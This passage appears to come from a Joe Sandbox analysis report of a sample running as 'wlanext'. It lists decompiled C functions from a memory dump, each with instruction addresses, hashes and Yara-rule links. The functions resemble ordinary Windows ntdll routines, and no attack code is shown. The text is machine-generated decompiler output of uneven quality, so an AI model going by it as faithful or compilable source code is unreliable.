                                  0x03513bab
                                  0x03513bb5
                                  0x03513bb9
                                  0x03556298
                                  0x03513bbf
                                  0x03513bc2
                                  0x03513bc3
                                  0x03513bc9
                                  0x03513bca
                                  0x03513bcc
                                  0x03513bcd
                                  0x03513bd4
                                  0x03513bd6
                                  0x03513bdb
                                  0x03513bea
                                  0x03513bf7
                                  0x03513bfb
                                  0x03513bff
                                  0x03513c09
                                  0x03513c0a
                                  0x03513c0b
                                  0x03513c0f
                                  0x03513c14
                                  0x03513c18
                                  0x03513c18
                                  0x03513bfb
                                  0x03513c1b
                                  0x03513c30
                                  0x03513c30
                                  0x03513c3d

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 842a5e57cf18761ffbf239738a952a8973d1dea128f348e8f8747bd45a85d094
                                  • Instruction ID: f4578f52fde98b3ef4cf0d96999b40f34ce2ed4bc0c61dcdaea47123a32cf8f4
                                  • Opcode Fuzzy Hash: 842a5e57cf18761ffbf239738a952a8973d1dea128f348e8f8747bd45a85d094
                                  • Instruction Fuzzy Hash: 8A21BE72A00209AFD710DF58ED81F5ABBBDFB44608F150068E909EB261D371AD169B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03566CF0 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E03566CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03507D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03507D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x34c5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0351F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0351F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03567016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03502400( &_v52);
								}
								_t21 = L03502400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                  0x03566cfb
                                  0x03566d00
                                  0x03566d02
                                  0x03566d06
                                  0x03566d0a
                                  0x03566d0e
                                  0x03566d19
                                  0x03566d2b
                                  0x03566d1b
                                  0x03566d24
                                  0x03566d24
                                  0x03566d33
                                  0x03566d39
                                  0x03566d46
                                  0x03566d4f
                                  0x03566d61
                                  0x03566d51
                                  0x03566d5a
                                  0x03566d5a
                                  0x03566d69
                                  0x03566d6b
                                  0x03566d6d
                                  0x03566d6f
                                  0x03566d6f
                                  0x03566d74
                                  0x03566d79
                                  0x03566d7a
                                  0x03566d7f
                                  0x03566d82
                                  0x03566d88
                                  0x03566d89
                                  0x03566d90
                                  0x03566d94
                                  0x03566da7
                                  0x03566db1
                                  0x03566db1
                                  0x03566dbb
                                  0x03566dbb
                                  0x03566d90
                                  0x03566d69
                                  0x03566d46
                                  0x03566dc6

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 932d183f9c502525b432d719d7662a24b3b0c57125ec52c12cd50ace37688dfd
                                  • Instruction ID: bd70ebc9ae6209ea13622c259626b02f8a495cbb38f2ee76f35b4b7f29ef7c61
                                  • Opcode Fuzzy Hash: 932d183f9c502525b432d719d7662a24b3b0c57125ec52c12cd50ace37688dfd
                                  • Instruction Fuzzy Hash: A521D0725003459BC311DF69E944B6BB7FCBFC1680F0A0956B940DB2B2E734D908C6A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B070D Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E035B070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E035B07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E035AAFDE( &_v8,  &_v12);
					E035B1293(_t38, _v28, _t60);
					if(E03507D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E035A14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                  0x035b071b
                                  0x035b0724
                                  0x035b0734
                                  0x035b0738
                                  0x035b074b
                                  0x035b074b
                                  0x035b0753
                                  0x035b0753
                                  0x035b0759
                                  0x035b075d
                                  0x035b0774
                                  0x035b0779
                                  0x035b077d
                                  0x035b0789
                                  0x035b0795
                                  0x035b07a7
                                  0x035b0797
                                  0x035b07a0
                                  0x035b07a0
                                  0x035b07af
                                  0x035b07c4
                                  0x035b07cd
                                  0x035b07cd
                                  0x035b07af
                                  0x035b07dc

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                  • Instruction ID: c60a55203892c7cac03a78ea424de4ec3fb17ec588cac1aca3ca6c33cd11d52e
                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                  • Instruction Fuzzy Hash: E721F57A204200AFD705DF18D884AABFBB5FFC4750F088669F9958B3A5D730D909CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03567794 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E03567794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x35d7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0352F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03507D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03529AE0();
					_t24 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                  0x03567799
                                  0x0356779a
                                  0x0356779b
                                  0x035677a3
                                  0x035677ab
                                  0x035677ae
                                  0x035677b1
                                  0x035677b1
                                  0x035677bf
                                  0x035677c4
                                  0x035677c8
                                  0x035677ce
                                  0x035677d4
                                  0x035677e0
                                  0x035677e0
                                  0x035677d6
                                  0x035677d6
                                  0x035677de
                                  0x00000000
                                  0x00000000
                                  0x035677de
                                  0x035677e5
                                  0x035677f0
                                  0x035677f3
                                  0x035677f6
                                  0x035677fd
                                  0x03567800
                                  0x0356780c
                                  0x03567818
                                  0x0356782b
                                  0x0356781a
                                  0x03567823
                                  0x03567823
                                  0x03567830
                                  0x03567831
                                  0x03567838
                                  0x0356783d
                                  0x0356783e
                                  0x0356784f
                                  0x0356784f
                                  0x0356785a

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32fdc9b675b6e7434b1291f3068c8f7b49d78c209d61f9c85b8e71663d80baa9
                                  • Instruction ID: fce8583102231030468bf870154a5b03c0437e35ddc267699d43696ed9c50daa
                                  • Opcode Fuzzy Hash: 32fdc9b675b6e7434b1291f3068c8f7b49d78c209d61f9c85b8e71663d80baa9
                                  • Instruction Fuzzy Hash: 1C219F76500604ABC725DF69E890E6BBBB8FF8C740F14056DE90ACB7A0E734E900CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350AE73 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0350AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03507D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03507D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03507D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03507D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03567794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                  0x0350ae78
                                  0x0350ae7c
                                  0x0350ae7e
                                  0x0350ae81
                                  0x0350ae86
                                  0x0350ae8d
                                  0x03552691
                                  0x0350ae93
                                  0x0350ae93
                                  0x0350ae93
                                  0x0350ae98
                                  0x0350ae9d
                                  0x035526a2
                                  0x035526b4
                                  0x035526a4
                                  0x035526ad
                                  0x035526ad
                                  0x035526b9
                                  0x00000000
                                  0x035526bb
                                  0x00000000
                                  0x035526bb
                                  0x0350aea3
                                  0x0350aea3
                                  0x0350aea3
                                  0x0350aeaa
                                  0x035526c0
                                  0x035526c9
                                  0x035526c9
                                  0x0350aeb3
                                  0x035526d4
                                  0x035526e1
                                  0x00000000
                                  0x00000000
                                  0x035526e7
                                  0x035526ee
                                  0x035526f0
                                  0x035526f9
                                  0x035526f9
                                  0x03552702
                                  0x03552708
                                  0x03552708
                                  0x0355270b
                                  0x0355270f
                                  0x03552711
                                  0x03552711
                                  0x03552725
                                  0x03552725
                                  0x00000000
                                  0x0350aeb9
                                  0x0350aeb9
                                  0x0350aebf
                                  0x0350aebf
                                  0x0350aeb3

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                  • Instruction ID: 66029ebbd0c85695edc86b97e3784d4bfb5a87f649bf75ee8389b292b557dd58
                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                  • Instruction Fuzzy Hash: F2219272A027819FD716DB69E954B2677E8BF44750F1E08E1ED048B6B2DB35EC40C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351FD9B Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0351FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E034F76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                  0x0351fd9b
                                  0x0351fda0
                                  0x0351fda1
                                  0x0351fdab
                                  0x0351fdad
                                  0x0351fdb0
                                  0x0351fdb8
                                  0x0351fe0f
                                  0x0351fde6
                                  0x0351fde9
                                  0x0351fdec
                                  0x0355c0c0
                                  0x0351fdfe
                                  0x0351fe06
                                  0x0351fe06
                                  0x0355c0c8
                                  0x0351fe2d
                                  0x0351fe2d
                                  0x00000000
                                  0x0351fe2d
                                  0x0355c0d1
                                  0x0355c0e0
                                  0x0355c0e5
                                  0x0355c0e5
                                  0x0355c0e8
                                  0x00000000
                                  0x0355c0e8
                                  0x0351fdf4
                                  0x00000000
                                  0x00000000
                                  0x0351fdf6
                                  0x0351fdfa
                                  0x0351fe1a
                                  0x0351fe1f
                                  0x0351fe1f
                                  0x0351fdfc
                                  0x00000000
                                  0x0351fdfc
                                  0x0351fdcc
                                  0x0351fdd0
                                  0x0351fe26
                                  0x00000000
                                  0x0351fe26
                                  0x0351fdd8
                                  0x0351fddb
                                  0x0351fddd
                                  0x0351fde0
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                  • Instruction ID: fda35f684f72de3ac2eb55454408e5088291ec86fac9d7e7d19dc31837a4a74e
                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                  • Instruction Fuzzy Hash: 3C217C72640A40DFE731CF0AE540A6AF7E5FB94B10F29866EE9458B631D735AC11CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351B390 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E0351B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03502280(_t12, 0x35d8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E035200C2(0x35d8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                  0x0351b395
                                  0x0351b3a2
                                  0x0351b3a5
                                  0x0351b3aa
                                  0x0351b3b2
                                  0x0351b3ba
                                  0x0351b3bd
                                  0x0351b3c0
                                  0x0351b3c4
                                  0x0351b3c9
                                  0x0355a3e9
                                  0x0355a3ed
                                  0x0355a3f0
                                  0x0355a3ff
                                  0x0355a403
                                  0x0355a409
                                  0x00000000
                                  0x00000000
                                  0x0355a40b
                                  0x0355a40b
                                  0x0355a40f
                                  0x0355a415
                                  0x0355a423
                                  0x0355a423
                                  0x0355a415
                                  0x0351b3d1
                                  0x0351b3e8
                                  0x0351b3e8
                                  0x0351b3d9

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ad6ca193d4f3cf67de1a29bc47f0ab1c9a296956bee11330e29f707f1acb41a
                                  • Instruction ID: 9fecaf65ef155a4c72269dde70860f98d9d67480d79f13bf9e40840b1714028c
                                  • Opcode Fuzzy Hash: 3ad6ca193d4f3cf67de1a29bc47f0ab1c9a296956bee11330e29f707f1acb41a
                                  • Instruction Fuzzy Hash: 02116F373011149BCB29DA55BD8152B73AAFBD5730B29052EED16CB3F0DA316C12C6D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E9240 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E034E9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x35bf708);
				E0353D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E035295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E035295D0();
				_t33 =  *0x35d84c4; // 0x0
				L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x35d84c4; // 0x0
				L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x35d84c4; // 0x0
				E03502280(L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x35d86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E035295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E035295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E034E9325();
					_t50 =  *0x35d84c4; // 0x0
					return E0353D0D1(L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                  0x034e9240
                                  0x034e9242
                                  0x034e9247
                                  0x034e924c
                                  0x034e924e
                                  0x034e9255
                                  0x034e9257
                                  0x034e925a
                                  0x034e925f
                                  0x034e925f
                                  0x034e9266
                                  0x034e9271
                                  0x034e9276
                                  0x034e9279
                                  0x034e927e
                                  0x034e9295
                                  0x034e929a
                                  0x034e92b1
                                  0x034e92b6
                                  0x034e92d7
                                  0x034e92dc
                                  0x034e92e0
                                  0x034e92e6
                                  0x034e92e8
                                  0x034e92ee
                                  0x034e9332
                                  0x034e9333
                                  0x034e9337
                                  0x034e9338
                                  0x034e933a
                                  0x034e933a
                                  0x034e933d
                                  0x034e9342
                                  0x034e9342
                                  0x034e9345
                                  0x034e9349
                                  0x034e934e
                                  0x034e9352
                                  0x034e9357
                                  0x034e92f4
                                  0x034e92f4
                                  0x034e92f6
                                  0x034e92f9
                                  0x034e9300
                                  0x034e9306
                                  0x034e9324
                                  0x034e9324

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a514cc7acfbacc8d25e68e83b39f4100a40615ad07d94d35d355ed208bda0ec3
                                  • Instruction ID: 6de343190ec6bbe3bf0c28080e9a6a7232d99bfeea3fe6c2534ebb0c91f3999f
                                  • Opcode Fuzzy Hash: a514cc7acfbacc8d25e68e83b39f4100a40615ad07d94d35d355ed208bda0ec3
                                  • Instruction Fuzzy Hash: 36214575141701DFC722EF28DA00F5AB7F9BF48704F0445A9A0198A6F2DB39E952DB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03574257 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E03574257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x35c08d0);
				E0353D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E035741E8(__ebx, __edi, __ecx, _t39);
				E034FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x35d87e4;
					_t18 =  *0x35d87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x35d5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x35d87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x35d87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L034E7055(_t31 + 0xfffffff8);
								_t24 =  *0x35d87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x35d87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x35d5cd0;
				if( *0x35d5cd0 <= 0) {
					L034E7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x35d87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x35d87e8 = _t30;
						 *0x35d87e0 = _t18 + 1;
					}
				}
